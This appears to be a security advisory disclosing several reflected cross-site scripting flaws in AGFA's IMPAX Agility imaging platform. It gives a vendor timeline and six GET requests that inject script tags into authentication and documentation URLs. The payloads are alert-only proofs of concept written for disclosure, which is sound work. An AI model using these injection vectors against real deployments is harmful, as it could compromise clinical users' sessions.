ImPAX Agility 1.1074.RC.b122.20150602 Cross Site Scripting

`ImPAX Agility Multiple Cross Site Scripting Vulnerabilities  
Tested versions: 1.1074.RC.b122.20150602  
http://www.agfahealthcare.com/  
  
Credits to: vesp3r / [email protected]  
  
  
About the Product  
------------------  
IMPAX Agility is designed to achieve clinical productivity and improve affordability.  
It uses a single data model to provide a seamless system that offers relevant and   
varied clinical data in one, completely unified imaging management platform.   
IMPAX Agility’s sophisticated GUI provides users an uncluttered and intuitive   
user experience, as well the native diagnostic capabilities, streamlined navigation  
and workflow, improve clinical productivity. Its modern IT platform helps hospitals  
to maximize performance and control costs, by reducing overhead, upgrade time and  
IT infrastructure investments.  
  
  
Timeline contact  
---------------  
  
02/17 - initial contact  
02/20 - Vendor asked for more information  
03/30 - The vendor said the issue was solved  
04/12 - Advisory published  
  
  
Reflected Cross-Site Scripting  
-----------------------------  
  
1) GET /authentication/j_security_check?ignore_expired=true&resource=%2fxero%2vtf8t3"><script>alert(1)<%2fscript>hcg7wy771pe&j_password=&j_username= HTTP/1.1  
2) GET /authentication/j_security_check?vt123"><script>alert(1)<%2fscript>be4rz=1 HTTP/1.1  
3) GET /docs/enterpriseviewer/knowledgebase/en/?awbkk"><script>alert(1)<%2fscript>q4kpp=1 HTTP/1.1  
4) GET /docs/enterpriseviewer/knowledgebase/en/topics/8825.html?vtzi2"><script>alert(1)<%2fscript>a6wo4=1 HTTP/1.1  
5) GET /authentication/token?resource=%2fdocs%2fenterpriseviewer%2fknowledgebase%2fen%2ftopics%2f124446.htmltestbug"><script>alert(1)<%2fscript>ahz3a HTTP/1.1  
6) GET /authentication/token?khr8y"><script>alert(1)<%2fscript>tn1f0=1 HTTP/1.1  
  
  
`